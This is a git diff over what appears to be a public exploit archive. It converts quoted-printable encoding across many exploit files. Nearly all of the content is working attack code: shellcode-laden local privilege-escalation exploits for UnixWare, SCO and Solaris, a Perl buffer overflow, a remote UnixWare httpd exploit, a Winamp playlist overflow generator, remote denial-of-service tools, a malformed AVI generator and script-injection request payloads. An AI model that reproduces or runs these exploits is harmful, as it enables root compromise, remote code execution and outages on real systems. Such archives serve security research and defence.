+$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest"; +$ctime=(stat($ui_dest))[10]; +print("$ui_dest size=$size ctime=$ctime\n"); ### # get the checksum value for $ui_dest ### open(SUM, "$sumpath -r $ui_dest|"); -$checksum=3D; +$checksum=; chomp($checksum); -@sumfields=3Dsplit(' ', $checksum); -$chksum =3D @sumfields[0]; -$chksum =3D~ s/^0//; +@sumfields=split(' ', $checksum); +$chksum = @sumfields[0]; +$chksum =~ s/^0//; print("$ui_dest checksum is $chksum\n"); @@ -90,7 +90,7 @@ print("$ui_dest checksum is $chksum\n"); # Put our entry into $uidatafile, use trailing newline ### -$uidata=3D"$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest"; +$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest"; print("placing '$uidata' into $uidatafile\n"); open(TMP, ">$uidatafile"); print(TMP "$uidata\n"); @@ -113,9 +113,9 @@ c ### open (PRIV, "$privloc"); -@privs =3D ; +@privs = ; foreach $priv (@privs) { - if ($priv =3D~ /$ui_dest/) { + if ($priv =~ /$ui_dest/) { print("Exploit successful. Run $ui_dest after reboot for rootshell \n"); exit(0); @@ -130,7 +130,7 @@ print("Exploit not successful, sorry!\n"); bash-2.02$ id = -uid=3D106(xnec) gid=3D1(other) +uid=106(xnec) gid=1(other) bash-2.02$ ls -la /etc/hosts.equiv UX:ls: ERROR: Cannot access /etc/hosts.equiv: No such file or directory bash-2.02$ ls -la /usr/bin/uidadmin diff --git a/platforms/sco/local/19656.c b/platforms/sco/local/19656.c index 932855840..42dc1ec9d 100755 --- a/platforms/sco/local/19656.c +++ b/platforms/sco/local/19656.c @@ -21,7 +21,7 @@ This is exploitable to gain root privileges even though /usr/X/bin/xauto is not #include #include -char scoshell[]=3D /* UnixWare 7.1 shellcode runs /tmp/ui */ +char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; @@ -38,7 +38,7 @@ void buildui() { FILE *fp; char cc[100]; - fp =3D fopen("/tmp/ui.c", "w"); + fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); @@ -49,17 +49,17 @@ void buildui() { int main(int argc, char *argv[]) { = - long int offset=3D0; + long int offset=0; = int i; - int egglen =3D EGGLEN; + int egglen = EGGLEN; int retlen; long int addr; char egg[EGGLEN]; char ret[RETLEN]; // who needs __asm__? Per Solar Designer's suggestion - unsigned long sp =3D (unsigned long)&sp; = + unsigned long sp = (unsigned long)&sp; = buildui(); @@ -68,22 +68,22 @@ int main(int argc, char *argv[]) { exit(0); = } - else if (argc =3D=3D 2){ - offset=3Datoi(argv[1]); - retlen=3DRETLEN; + else if (argc == 2){ + offset=atoi(argv[1]); + retlen=RETLEN; } - else if (argc =3D=3D 3) { - offset=3Datoi(argv[1]); - retlen=3Datoi(argv[2]); = + else if (argc == 3) { + offset=atoi(argv[1]); + retlen=atoi(argv[2]); = } else { - offset=3D9400; - retlen=3D2000; + offset=9400; + retlen=2000; = } - addr=3Dsp + offset; + addr=sp + offset; = fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid @@ -96,12 +96,12 @@ int main(int argc, char *argv[]) { memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); = - for(i=3DALIGN;i< retlen-4;i+=3D4) - *(int *)&ret[i]=3Daddr; = + for(i=ALIGN;i< retlen-4;i+=4) + *(int *)&ret[i]=addr; = = - memcpy(egg, "EGG=3D", 4); + memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); = diff --git a/platforms/sco/local/19674.c b/platforms/sco/local/19674.c index 40ca1376b..1dae24a33 100755 --- a/platforms/sco/local/19674.c +++ b/platforms/sco/local/19674.c @@ -29,7 +29,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g ** When you "run" and break at _init, change your EIP ** to something between 0x8046000 and 0x8048000 with = - ** "set $eip =3D 0x8046b75" and "continue" twice. + ** "set $eip = 0x8046b75" and "continue" twice. ** ** ** Brock Tellier btellier@usa.net @@ -40,7 +40,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g #include #include -char scoshell[]=3D /* This isn't a buffer overflow! really! */ +char scoshell[]= /* This isn't a buffer overflow! really! */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; @@ -66,11 +66,11 @@ void usage(int ftype) { void buildsm(int ftype) { FILE *fp; char cc[100]; - fp =3D fopen("/tmp/sm.c", "w"); + fp = fopen("/tmp/sm.c", "w"); - if (ftype =3D=3D 1) fprintf(fp, DACREAD); - else if(ftype =3D=3D 2) fprintf(fp, DACWRITE); - else if(ftype =3D=3D 3) fprintf(fp, SETUID); + if (ftype == 1) fprintf(fp, DACREAD); + else if(ftype == 2) fprintf(fp, DACWRITE); + else if(ftype == 3) fprintf(fp, SETUID); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c"); @@ -81,20 +81,20 @@ void buildsm(int ftype) { int main(int argc, char *argv[]) { int i; -int buflen =3D LEN; +int buflen = LEN; char buf[LEN]; = -int filetype =3D 0; +int filetype = 0; char filebuf[20]; = - if(argc > 2 || argc =3D=3D 1) { + if(argc > 2 || argc == 1) { usage(filetype); exit(0); = } - if ( argc > 1 ) filetype=3Datoi(argv[1]); + if ( argc > 1 ) filetype=atoi(argv[1]); if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); } buildsm(filetype); @@ -104,9 +104,9 @@ fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); memset(buf,NOP,buflen); memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); -memcpy(buf, "XNEC=3D", 5); +memcpy(buf, "XNEC=", 5); putenv(buf); -buf[buflen - 1] =3D 0; +buf[buflen - 1] = 0; system("/bin/sh"); exit(0); diff --git a/platforms/solaris/local/19529.c b/platforms/solaris/local/19529.c index c1faa358f..b19764c10 100755 --- a/platforms/solaris/local/19529.c +++ b/platforms/solaris/local/19529.c @@ -8,7 +8,7 @@ A buffer overflow vulnerability in the '/usr/bin/mail' program's handling of the * Shellcode by Cheez Whiz (fixes problem with shells dropping egid if it= doesn't match your real gid) - * Will set gid=3D6(mail) + * Will set gid=6(mail) * * gcc -o mailex solx86gid.c * /usr/bin/mail -m `./mailex 0 1975 2285` foo @@ -31,7 +31,7 @@ doesn't match your real gid) #define NOP 0x90 -char shell[] =3D +char shell[] = /* 0 */ "\xeb\x45" /* jmp springboard */ /* syscall: */ /* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */ @@ -90,29 +90,29 @@ main (int argc, char *argv[]) if (argc > 1) - offset =3D strtol(argv[1], NULL, 0); + offset = strtol(argv[1], NULL, 0); if (argc > 2) - nop =3D strtoul(argv[2], NULL, 0); + nop = strtoul(argv[2], NULL, 0); else - nop =3D 285; + nop = 285; if (argc > 3) - buflen=3Datoi(argv[3]); + buflen=atoi(argv[3]); else = - buflen=3DBUF; + buflen=BUF; = - esp =3D get_esp(); + esp = get_esp(); memset(buf, NOP, buflen); memcpy(buf+nop, shell, strlen(shell)); - for (i =3D nop+strlen(shell); i < buflen-4; i +=3D 4) - *((int *) &buf[i]) =3D esp+offset; + for (i = nop+strlen(shell); i < buflen-4; i += 4) + *((int *) &buf[i]) = esp+offset; - for (i =3D 0; i < strlen(buf); i++) putchar(buf[i]); + for (i = 0; i < strlen(buf); i++) putchar(buf[i]); return; } diff --git a/platforms/solaris/local/19872.c b/platforms/solaris/local/19872.c index 0b4756107..2f8988612 100755 --- a/platforms/solaris/local/19872.c +++ b/platforms/solaris/local/19872.c @@ -1,8 +1,9 @@ + source: http://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root. -/*=20 +/* * * solaris 2.7 lpset local exploit, i386. * discovered by: duke @@ -21,7 +22,7 @@ A vulnerability exists in the handling of the -r option to the lpset program, as #include #include -char shellcode[] =3D +char shellcode[] = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" @@ -33,36 +34,36 @@ long get_esp() { __asm__("movl %esp,%eax"); } int main (int argc, char *argv[]) { - long offset=3D410; - int nop=3D64; - int gab=3D40; + long offset=410; + int nop=64; + int gab=40; long addr; char buffer[210]; int i, a, b; -if (argc > 1) offset =3D strtol(argv[1], NULL, 0); -if (argc > 2) gab =3D strtol(argv[2], NULL, 0); -if (argc > 3) nop =3D strtol(argv[2], NULL, 0); +if (argc > 1) offset = strtol(argv[1], NULL, 0); +if (argc > 2) gab = strtol(argv[2], NULL, 0); +if (argc > 3) nop = strtol(argv[2], NULL, 0); - for (a =3D 0; a > 8; - buffer[a++] =3D (addr & 0x00ff0000) >> 16; - buffer[a++] =3D (addr & 0xff000000) >> 24; + buffer[a++] = addr & 0x000000ff; + buffer[a++] = (addr & 0x0000ff00) >> 8; + buffer[a++] = (addr & 0x00ff0000) >> 16; + buffer[a++] = (addr & 0xff000000) >> 24; for ( ; a < nop; a++) - buffer[a] =3D 0x90; + buffer[a] = 0x90; - for (b =3D 0; b < strlen(shellcode); b++, a++) - buffer[a] =3D shellcode[b]; + for (b = 0; b < strlen(shellcode); b++, a++) + buffer[a] = shellcode[b]; - buffer[strlen(buffer)] =3D '\0'; + buffer[strlen(buffer)] = '\0'; - printf("addr =3D 0x%x\n", addr); + printf("addr = 0x%x\n", addr); execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL); } \ No newline at end of file diff --git a/platforms/unix/local/22335.pl b/platforms/unix/local/22335.pl index 4691a121b..5b6855ec7 100755 --- a/platforms/unix/local/22335.pl +++ b/platforms/unix/local/22335.pl @@ -5,30 +5,30 @@ It has been reported that a buffer overflow exists in Tower Toppler. A local use #!/usr/bin/perl #kokanin@dtors.net playing a game #hi bob -$len =3D 1024; -$ret =3D 0xbfbffd31; -$nop =3D "\x90"; -$offset =3D 0; -$shellcode =3D = +$len = 1024; +$ret = 0xbfbffd31; +$nop = "\x90"; +$offset = 0; +$shellcode = = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9\x9d; -if (@ARGV =3D=3D 1) { - $offset =3D $ARGV[0]; +if (@ARGV == 1) { + $offset = $ARGV[0]; } =20 -for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) { - $buffer .=3D $nop; +for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { + $buffer .= $nop; } =20 -$buffer .=3D $shellcode; +$buffer .= $shellcode; -$new_ret =3D pack('l', ($ret + $offset)); +$new_ret = pack('l', ($ret + $offset)); =20 -for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) { - $buffer .=3D $new_ret; +for ($i += length($shellcode); $i < $len; $i += 4) { + $buffer .= $new_ret; } -local($ENV{'EGG'}) =3D $buffer;=20 -local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20 +local($ENV{'EGG'}) = $buffer;=20 +local($ENV{'DISPLAY'}) = $new_ret x 64;=20 exec("toppler 2>/dev/null"); \ No newline at end of file diff --git a/platforms/unixware/remote/19705.c b/platforms/unixware/remote/19705.c index 524babdf9..b8dcb43b2 100755 --- a/platforms/unixware/remote/19705.c +++ b/platforms/unixware/remote/19705.c @@ -31,7 +31,7 @@ The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnera #define NOP 0x90 #define LEN 102 -char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */ +char shell[] = /* Cheez Whiz, cheezbeast@hotmail.com */ "\xeb\x5f" /* jmp springboard */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */ "\xc3" /* ret */ @@ -78,7 +78,7 @@ char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */ "\x2d\x63\xff"; /* DATA */ -char *auth=3D +char *auth= " HTTP/1.0\r\n" "Host: localhost:457\r\n" "Accept: text/html\r\n" @@ -89,13 +89,13 @@ char *auth=3D char buf[BUFLEN]; char exploit[BUFLEN]; -char *cmd =3D "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0"; +char *cmd = "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0"; int len,i,sock; -int size =3D 368; -int offset=3D300; -int port =3D 457; -long sp =3D 0xbffc6004; -//unsigned long sp =3D (unsigned long)&sp; +int size = 368; +int offset=300; +int port = 457; +long sp = 0xbffc6004; +//unsigned long sp = (unsigned long)&sp; struct sockaddr_in sock_a; struct hostent *host; @@ -106,20 +106,20 @@ void main (int argc, char *argv[]) { fprintf(stderr, "Error:Usage: %s \n", argv[0]); exit(0); } - if(argc > 2) offset=3Datoi(argv[2]); - if(argc > 3) size=3Datoi(argv[3]); + if(argc > 2) offset=atoi(argv[2]); + if(argc > 3) size=atoi(argv[3]); = - sp =3D sp + offset; + sp = sp + offset; memset(exploit, NOP, size - strlen(shell) - strlen(cmd)- 6); /* put size of *cmd into shellcode */ - len =3D strlen(cmd); len++; len =3D -len; - shell[LEN+0] =3D (len >> 0) & 0xff; - shell[LEN+1] =3D (len >> 8) & 0xff; - shell[LEN+2] =3D (len >> 16) & 0xff; - shell[LEN+3] =3D (len >> 24) & 0xff; + len = strlen(cmd); len++; len = -len; + shell[LEN+0] = (len >> 0) & 0xff; + shell[LEN+1] = (len >> 8) & 0xff; + shell[LEN+2] = (len >> 16) & 0xff; + shell[LEN+3] = (len >> 24) & 0xff; memcpy(exploit+(size-strlen(shell)-strlen(cmd)-6), shell, strlen(shell))= ; @@ -128,37 +128,37 @@ void main (int argc, char *argv[]) { = - exploit[size-5]=3D(sp & 0x000000ff); - exploit[size-4]=3D(sp & 0x0000ff00) >> 8; - exploit[size-3]=3D(sp & 0x00ff0000) >> 16; - exploit[size-2]=3D(sp & 0xff000000) >> 24; - exploit[size-1]=3D0; = + exploit[size-5]=(sp & 0x000000ff); + exploit[size-4]=(sp & 0x0000ff00) >> 8; + exploit[size-3]=(sp & 0x00ff0000) >> 16; + exploit[size-2]=(sp & 0xff000000) >> 24; + exploit[size-1]=0; = sprintf(buf, "GET /%s %s%s\r\n\r\n", exploit, auth,exploit); - buf[BUFLEN - 1] =3D 0; + buf[BUFLEN - 1] = 0; fprintf(stderr, "httpd remote exploit for UnixWare 7.1\n"); fprintf(stderr, "using addr 0x%x offset %d\n", sp, offset); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); - if((host=3D(struct hostent *)gethostbyname(argv[1])) =3D=3D NULL) { + if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); = exit(-1); } = - if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { + if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("create socket"); exit(-1); } - sock_a.sin_family=3DAF_INET; - sock_a.sin_port=3Dhtons(port); + sock_a.sin_family=AF_INET; + sock_a.sin_port=htons(port); memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); - if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=3D0) { + if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { perror("create connect"); exit(-1); } diff --git a/platforms/windows/dos/19720.c b/platforms/windows/dos/19720.c index 48903d9e7..7dc8ae0cc 100755 --- a/platforms/windows/dos/19720.c +++ b/platforms/windows/dos/19720.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/925/info Winamp, a program for playing mp3 and other audio files, uses playlist files (*.pls) to store lists of files for playback. The code that reads these files has an unchecked buffer which can be overflowed to cause arbitrary code to be executed. If an entry longer than 580 bytes is specified in the file, EIP gets overwritten. This vulnerability can only be exploited remotely by convincing someone to download the hostile playlist and load it into Winamp. IE5 will download .pls files without user confirmation if winamp is installed. +*/ /* Stack based buffer overflow exploit for Winamp v2.10 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net @@ -28,8 +30,8 @@ int main() printf("\t\t.......................................\n\n"); char buffer[640]; -char eip[8] =3D "\xF7\xCF\xB9\xBF"; -char sploit[256] =3D = +char eip[8] = "\xF7\xCF\xB9\xBF"; +char sploit[256] = = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\= xFA\x2E\xC6 @@ -43,22 +45,21 @@ xEC\xBA\xFF FILE *file; - for(int x=3D0;x<580;x++) + for(int x=0;x<580;x++) { - buffer[x] =3D 0x90; + buffer[x] = 0x90; } -file =3D fopen("crAsh.pls","wb"); +file = fopen("crAsh.pls","wb"); fprintf(file, "[playlist]\n"); -fprintf(file, "File1=3D"); +fprintf(file, "File1="); fprintf(file, "%s", buffer); fprintf(file, "%s", eip); fprintf(file, "%s", sploit); -fprintf(file, "\nNumberOfEntries=3D1"); +fprintf(file, "\nNumberOfEntries=1"); fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; } - diff --git a/platforms/windows/dos/19806.c b/platforms/windows/dos/19806.c index 9735cd3a2..306b3bbab 100755 --- a/platforms/windows/dos/19806.c +++ b/platforms/windows/dos/19806.c @@ -35,16 +35,16 @@ main (int argc, char **argv) struct hostent *he; fprintf (stderr, - "\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\n"); + "\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n"); if (argc < 2) usage (argv[0]); - type =3D 0; + type = 0; if (argc > 2) - type =3D atol (argv[2]); + type = atol (argv[2]); - ptr =3D buffer; + ptr = buffer; switch (type) { case 1: @@ -76,38 +76,38 @@ buffer); break; } - if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) + if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror ("socket()"); return -1; } - if ((he =3D gethostbyname (argv[1])) !=3D NULL) + if ((he = gethostbyname (argv[1])) != NULL) { - ip =3D *(unsigned long *) he->h_addr; + ip = *(unsigned long *) he->h_addr; } else { - if ((ip =3D inet_addr (argv[1])) =3D=3D NULL) + if ((ip = inet_addr (argv[1])) == NULL) { perror ("inet_addr()"); return -1; } } - sin.sin_family =3D AF_INET; - sin.sin_addr.s_addr =3D ip; + sin.sin_family = AF_INET; + sin.sin_addr.s_addr = ip; switch (type) { case 1: - sin.sin_port =3D htons (110); + sin.sin_port = htons (110); break; case 2: - sin.sin_port =3D htons (25); + sin.sin_port = htons (25); break; default: - sin.sin_port =3D htons (143); + sin.sin_port = htons (143); break; } diff --git a/platforms/windows/dos/21830.py b/platforms/windows/dos/21830.py index 029fbcb08..e02625d2a 100755 --- a/platforms/windows/dos/21830.py +++ b/platforms/windows/dos/21830.py @@ -7,8 +7,8 @@ vulnerability # Tested on: windows 7 Ultimate k # Language : python -f =3D open("hack.avi", "wb") -data =3D "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54= +f = open("hack.avi", "wb") +data = "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54= " \ "\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" = \ @@ -41,7 +41,7 @@ f.write(data) for i in range(0, 0x71a): f.write("\x00") -data =3D "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\= +data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\= x3d\x4c\x00" f.write(data) diff --git a/platforms/windows/dos/23234.c b/platforms/windows/dos/23234.c index b2ccb03be..b15efec91 100755 --- a/platforms/windows/dos/23234.c +++ b/platforms/windows/dos/23234.c @@ -41,7 +41,7 @@ SOCKADDR_IN sin; char *sav; WSADATA wsadata; -WORD wVersionRequested =3D MAKEWORD (2,0); +WORD wVersionRequested = MAKEWORD (2,0); printf ("- FirsClass Internet Services Remote DoS -\n\n" "Discovered & coded by I2S-LAB\n" @@ -56,7 +56,7 @@ ExitProcess (0); if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0); -if (!(sav =3D (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) ) +if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) ) { printf ("Error ! cannot allocate enough memory.\n"); ExitProcess (0); @@ -66,20 +66,20 @@ lstrcat (sav, "GET / HTTP/1.1"); memset (&sav[14], 'A', PerfectOverwrite - 4); lstrcat (sav,"DDDD\r\n\r\n"); -sin.sin_family =3D AF_INET; -sin.sin_port =3D htons (80); +sin.sin_family = AF_INET; +sin.sin_port = htons (80); -if ( (sin.sin_addr.s_addr=3Dinet_addr (argv[1])) =3D=3D INADDR_NONE) +if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE) { printf ("Incorrect IP Address : %s\n", argv[1]); ExitProcess(0); } -sock1 =3D socket (AF_INET, SOCK_STREAM, 0); +sock1 = socket (AF_INET, SOCK_STREAM, 0); printf ("\nconnecting to %s...", argv[1]); -if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) =3D=3D SOCKET_ERROR ) +if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR ) printf ("connection failed!\n"); else diff --git a/platforms/windows/dos/28897.txt b/platforms/windows/dos/28897.txt index 71f5de655..f7803d4f2 100755 --- a/platforms/windows/dos/28897.txt +++ b/platforms/windows/dos/28897.txt @@ -11,4 +11,4 @@ charset="windows-1251" Content-Transfer-Encoding: quoted-printable Content-Location: about:blank - - [PERSISTENT INJECTED SCRIPT CODE!]'=20 - src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"> - [PERSISTENT INJECTED SCRIPT CODE!]'=20 - src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"> - [PERSISTENT INJECTED SCRIPT CODE!]'=20 - src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"> - =A31.00 - 10 - 10 - 0 - 0 - 0 - =A312.00 - - - - 12/24/2012 + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + =A31.00 + 10 + 10 + 0 + 0 + 0 + =A312.00 + + + + 12/24/2012 - BBA123G - Angled Building Block + BBA123G + Angled Building Block @@ -264,76 +264,76 @@ Code Review: - +

Fault Description

Created: 12/25/2012

- + = [PERSISTENT INJECTED SCRIPT CODE!] - +BORDER-RIGHT: #000000 1px solid" + border=0 cellSpacing=10 cellPadding=8 = +width="100%"> - +

Resolution

Resolved:

- + = [PERSISTENT INJECTED SCRIPT CODE!] - +BORDER-RIGHT: #000000 1px solid" + border=0 cellSpacing=10 cellPadding=8 = +width="100%"> - Fault = -Report Notes=20 + Fault = +Report Notes - + [PERSISTENT INJECTED SCRIPT CODE!] - +BORDER-RIGHT: #000000 1px solid" + border=0 cellSpacing=10 cellPadding=8 = +width="100%"> - Order Notes = + Order Notes = - + [PERSISTENT INJECTED SCRIPT CODE!] - - + ... @@ -353,25 +353,25 @@ Content-Type: multipart/related; X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157 - class=3Dstyle20>
 - -
-


+ +
+



+src="" + width=323 height=99>

[PERSISTENT INJECTED SCRIPT CODE!]
[PERSISTENT INJECTED SCRIPT CODE!]

- - +
+ - +src="" + width=1 height=450> Risk: diff --git a/platforms/windows/webapps/26807.txt b/platforms/windows/webapps/26807.txt index c7ce2fee1..be2bb6a32 100755 --- a/platforms/windows/webapps/26807.txt +++ b/platforms/windows/webapps/26807.txt @@ -45,7 +45,7 @@ McAfee Solution: Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013. Item "b" has been addressed per Security Bulletin SB10043. -(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043) +(https://kc.mcafee.com/corporate/index?page=content&id=SB10043) @@ -58,10 +58,10 @@ b. POST /console/createDashboardContainer.do HTTP/1.1 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard c. POST /console/createDashboardContainer.do HTTP/1.1 -elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30& -width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo -nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/>&orion.user.sec -urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard +elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30& +width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&mo +nitorUrl=http%3A%2F%2Fwww.xxxx.com"/>&orion.user.sec +urity.token=9BslgbJEv2JqQy3k&ajaxMode=standard d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1